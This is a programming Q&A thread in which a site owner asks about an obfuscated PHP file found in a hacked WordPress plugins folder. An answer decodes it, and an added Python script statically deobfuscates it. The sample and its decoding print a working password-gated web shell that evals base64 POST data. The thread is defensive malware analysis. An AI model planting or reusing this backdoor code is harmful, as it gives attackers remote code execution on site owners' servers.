
Just a quick question.... I found a malicious file on a site (since removed) but I'm wondering what it's doing. Below is the code, any insight would be greatly appreciated.

```php
function myfunc () {
$_myfunc1 = '63ebc49bf6d9fc5bed6af96a894db6cd';
$_myfunc2 = "\x63\x68\x72";
$_g1qm3 = $_g1qm2(115).$_g1qm2(116)."\x72".$_g1qm2(114)."\x65".$_g1qm2(118);
$_g1qm4 = $_g1qm3($_g1qm2(101).$_g1qm2(100)."\x6f\x63".$_g1qm2(101)."\x64".$_g1qm2(95).$_g1qm2(52)."\x36".$_g1qm2(101)."\x73\x61".$_g1qm2(98));
$_g1qm5 = $_g1qm3("\x65\x63".$_g1qm2(97)."\x6c\x70\x65".$_g1qm2(114)."\x5f\x67\x65".$_g1qm2(114)."\x70");
$_g1qm6 = $_g1qm3("\x6c".$_g1qm2(97)."\x76\x65");
$_g1qm5($_g1qm3('e'.$_g1qm2(47).'*./'),"@$_g1qm6($_g1qm4(\"JGxvZyA9ICdwcnQnOyBpZiAoIWlzc2V0KCRfU0VTU0lPTikpIHsgCXNlc3Npb25fc3RhcnQoKTsgfSBpZiAoaXNzZXQoJF9TRVNTSU9OWydsb2cnXSkgJiYgKCRfU0VTU0lPTlsnbG9nJ10gPT0gJGxvZykpIHsgCWlmIChpc3NldCgkX1BPU1RbJ210cSddKSkgeyAgCQkkcHQgPSBiYXNlNjRfZGVjb2RlKCRfUE9TVFsnbXRxJ10pOyAJCWV2YWwoJHB0KTsgCQlleGl0OyAJfSB9IGlmIChpc3NldCgkX1BPU1RbJ3B3eCddKSAmJiAobWQ1KCRfUE9TVFsncHd4J10pID09ICRfZzFxbTEpKSB7IAkkX1NFU1NJT05bJ2xvZyddID0gJGxvZzsgCWV4aXQ7IH0K\"))",'');} @_g1qm0();
}
```
  • Firstly I think this question would be better suited elsewhere, maybe on code review or security. And where does `$_g1qm2` come from? That is being set out of the blue. – chriz Dec 16 '15 at 14:58
  • @chriz It's not on topic on code review either! This isn't OP's code, and well... even if it was we don't do code explanation, we review code. Security would be the good fit, there already are questions like that there. – IEatBagels Dec 16 '15 at 15:04
  • It's not on-topic on Code Review either. – Mast Dec 16 '15 at 15:04
  • Gah, well I will just get back into my hole! p.s. not saying I am right, but I did imply _maybe_. Nonetheless it shouldn't be here. – chriz Dec 16 '15 at 15:05
  • @chriz It's alright, it indeed shouldn't be on StackOverflow. You tried something! :p Both Code Review and Programmers have guides on what's on-topic. You should check them if you want to propose migrations! :) – IEatBagels Dec 16 '15 at 15:09
  • If you do a recursive de-obfuscation you will see the original code (although some variables are missing from the code posted) and see what it does; see for example [PHPDeObfuscator](https://github.com/foo123/PHPDeobfuscator) for an example of how to do it. – Nikos M. Dec 16 '15 at 15:10
  • @TopinFrassi Goes to show how much time I spend elsewhere! I will definitely check out those topic pages. Thanks for understanding. – chriz Dec 16 '15 at 15:11
  • @TopinFrassi: Good luck grokking the on-topic rules for Programmers! I don't think even the mods have figured it out yet... – Lightness Races in Orbit Dec 16 '15 at 15:16
  • @LightnessRacesinOrbit In case of doubt, I hop in The Whiteboard and let them decide :p – IEatBagels Dec 16 '15 at 15:17
  • Thanks for the help guys, sorry if this is in the wrong place. I'm just trying to find out if that code is trying to link to another file on the site that I may need to investigate. – JChops Dec 16 '15 at 15:22
  • @TopinFrassi: It's really not that much better there ;) – Lightness Races in Orbit Dec 16 '15 at 17:19

1 Answer

This code is not complete, but from what I've decoded it is:

```php
$log = 'prt';

if (!isset($_SESSION)) {
    session_start();
}

if (isset($_SESSION['log']) && ($_SESSION['log'] == $log)) {
    if (isset($_POST['mtq'])) {
        $pt = base64_decode($_POST['mtq']);
        eval($pt);
        exit;
    }
}

if (isset($_POST['pwx']) && (md5($_POST['pwx']) == $_g1qm1)) {
    $_SESSION['log'] = $log;
    exit;
}
```

So in simple words, it looks for the `mtq` param from the POST request and executes it in shell. Data comes in base64-encoded format. It also stores one variable in the session on key `log`.

Also:

`$_myfunc2 = "\x63\x68\x72";` is decoded to `chr`, which is a function in PHP that returns a character based on an ASCII code.

`$_myfunc1 = '63ebc49bf6d9fc5bed6af96a894db6cd';` looks like an md5 hash, but I'm not sure.

`$_g1qm3 = $_g1qm2(115).$_g1qm2(116)."\x72".$_g1qm2(114)."\x65".$_g1qm2(118);` means `$_g1qm3` is the `strrev` function.

`$_g1qm4 = $_g1qm3($_g1qm2(101).$_g1qm2(100)."\x6f\x63".$_g1qm2(101)."\x64".$_g1qm2(95).$_g1qm2(52)."\x36".$_g1qm2(101)."\x73\x61".$_g1qm2(98));` is `base64_decode()`.

`$_g1qm5 = $_g1qm3("\x65\x63".$_g1qm2(97)."\x6c\x70\x65".$_g1qm2(114)."\x5f\x67\x65".$_g1qm2(114)."\x70");` is `preg_replace()`.

`$_g1qm6 = $_g1qm3("\x6c".$_g1qm2(97)."\x76\x65");` is `eval()`.

  • Thanks guys, this was in a wordpress file that was sitting in the plugins folder of a site that recently got hacked. The code posted is incorrect, sorry, function starts out as `function $_g1qm0 () { $_g1qm1 = '63ebc49bf6d9fc5bed6af96a894db6cd'; $_g1qm2 = "\x63\x68\x72";` – JChops Dec 16 '15 at 15:17
  • I've updated answer. – Robert Dec 16 '15 at 15:24
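The answer above decodes the sample by hand. For anyone who has to triage a file like this, the safer habit is to resolve the `chr()` / `\xHH` / `strrev()` string building statically and base64-decode the blob yourself, never letting the PHP run. The following Python script is an added example (not code from the question, the answer, or any project mentioned here). It assumes, as JChops' comment states, that `$_g1qm2` holds the string `"chr"`; the string expressions and the base64 payload are copied from the question, and the variable names in the result dictionary are the sample's own.

```python
"""Static decoder for the chr()/strrev()/base64 layering used in the posted sample.

Added example (not code from the question or the answer). It rebuilds the hidden
function names and the base64 payload by plain string manipulation, so nothing from
the sample is executed. It assumes, as the OP's comment states, that $_g1qm2 holds
the string "chr"; the expressions below are copied from the question.
"""
import base64
import re

# Concatenations of $_g1qm2(N) (chr) calls and quoted literals, as posted.
SAMPLE_EXPRESSIONS = {
    "_g1qm3": r'$_g1qm2(115).$_g1qm2(116)."\x72".$_g1qm2(114)."\x65".$_g1qm2(118)',
    "_g1qm4": r'$_g1qm2(101).$_g1qm2(100)."\x6f\x63".$_g1qm2(101)."\x64".$_g1qm2(95)'
              r'.$_g1qm2(52)."\x36".$_g1qm2(101)."\x73\x61".$_g1qm2(98)',
    "_g1qm5": r'"\x65\x63".$_g1qm2(97)."\x6c\x70\x65".$_g1qm2(114)."\x5f\x67\x65".$_g1qm2(114)."\x70"',
    "_g1qm6": r'"\x6c".$_g1qm2(97)."\x76\x65"',
}
# First argument of the final $_g1qm5(...) call: the regex pattern, also built reversed.
PATTERN_EXPRESSION = r"'e'.$_g1qm2(47).'*./'"
# The base64 blob handed to $_g1qm4, copied from the question (split only for line length).
PAYLOAD_B64 = (
    "JGxvZyA9ICdwcnQnOyBpZiAoIWlzc2V0KCRfU0VTU0lPTikpIHsgCXNlc3Npb25fc3RhcnQoKTsgfSBpZiAo"
    "aXNzZXQoJF9TRVNTSU9OWydsb2cnXSkgJiYgKCRfU0VTU0lPTlsnbG9nJ10gPT0gJGxvZykpIHsgCWlmIChp"
    "c3NldCgkX1BPU1RbJ210cSddKSkgeyAgCQkkcHQgPSBiYXNlNjRfZGVjb2RlKCRfUE9TVFsnbXRxJ10pOyAJ"
    "CWV2YWwoJHB0KTsgCQlleGl0OyAJfSB9IGlmIChpc3NldCgkX1BPU1RbJ3B3eCddKSAmJiAobWQ1KCRfUE9T"
    "VFsncHd4J10pID09ICRfZzFxbTEpKSB7IAkkX1NFU1NJT05bJ2xvZyddID0gJGxvZzsgCWV4aXQ7IH0K"
)

PART = re.compile(
    r"\$_g1qm2\((\d+)\)"            # $_g1qm2(N): chr(N)
    r'|"((?:[^"\\]|\\.)*)"'         # "...": double-quoted literal, \xHH escapes
    r"|'((?:[^'\\]|\\.)*)'"         # '...': single-quoted literal, taken verbatim
)


def _expand_double_quoted(body: str) -> str:
    """Expand the \\xHH escapes PHP resolves inside double-quoted strings."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), body)


def resolve_concat(expr: str) -> str:
    """Statically evaluate a PHP concatenation of chr() calls and string literals."""
    pieces = []
    for chr_code, double_quoted, single_quoted in PART.findall(expr):
        if chr_code:
            pieces.append(chr(int(chr_code)))
        elif double_quoted:
            pieces.append(_expand_double_quoted(double_quoted))
        else:
            pieces.append(single_quoted)
    return "".join(pieces)


def uses_eval_modifier(pattern: str) -> bool:
    """True if a PCRE pattern string carries PHP's 'e' modifier, which made
    preg_replace() evaluate the replacement as PHP code (removed in PHP 7)."""
    delimiter = pattern[0]
    closing = pattern.rfind(delimiter)
    return closing > 0 and "e" in pattern[closing + 1:]


def decode_sample() -> dict:
    """Recover what each obfuscated variable holds and the PHP the payload decodes to."""
    chr_alias = resolve_concat(r'"\x63\x68\x72"')            # $_g1qm2
    if chr_alias != "chr":
        raise ValueError("sample assumes $_g1qm2 resolves to chr")
    # $_g1qm3 is spelled forwards; everything after it is spelled backwards and
    # passed through $_g1qm3 (strrev) at runtime.
    functions = {"_g1qm3": resolve_concat(SAMPLE_EXPRESSIONS["_g1qm3"])}
    if functions["_g1qm3"] != "strrev":
        raise ValueError("unexpected value for $_g1qm3")
    for name in ("_g1qm4", "_g1qm5", "_g1qm6"):
        functions[name] = resolve_concat(SAMPLE_EXPRESSIONS[name])[::-1]
    pattern = resolve_concat(PATTERN_EXPRESSION)[::-1]
    payload = base64.b64decode(PAYLOAD_B64).decode("utf-8")
    return {
        "chr_alias": chr_alias,
        "functions": functions,
        "pattern": pattern,
        "eval_modifier": uses_eval_modifier(pattern),
        "payload": payload,
    }


if __name__ == "__main__":
    result = decode_sample()
    for var, fn in result["functions"].items():
        print(f"${var} = {fn}")
    print(f"preg_replace pattern: {result['pattern']} (e modifier: {result['eval_modifier']})")
    print("decoded payload:\n" + result["payload"])
```

Run as-is it prints `strrev`, `base64_decode`, `preg_replace`, `eval`, the pattern `/.*/e`, and the same PHP that the answer shows. The pattern is the part the answer does not spell out: the last line of the sample is `preg_replace('/.*/e', "@eval(base64_decode(...))", '')`, and it is the `e` modifier, not `eval` itself, that runs the replacement string as code. Two things follow for cleanup: a `preg_replace` whose pattern ends in `e` is worth treating as a code-execution sink in any PHP you grep through, and since the decoded payload only reads `$_POST['pwx']` and `$_POST['mtq']`, it does not reference any other file on the site, which answers JChops' question; the `md5` compare against `$_g1qm1` is the shell's password gate, so `pwx` values in the web server's POST logs are the thing to look for.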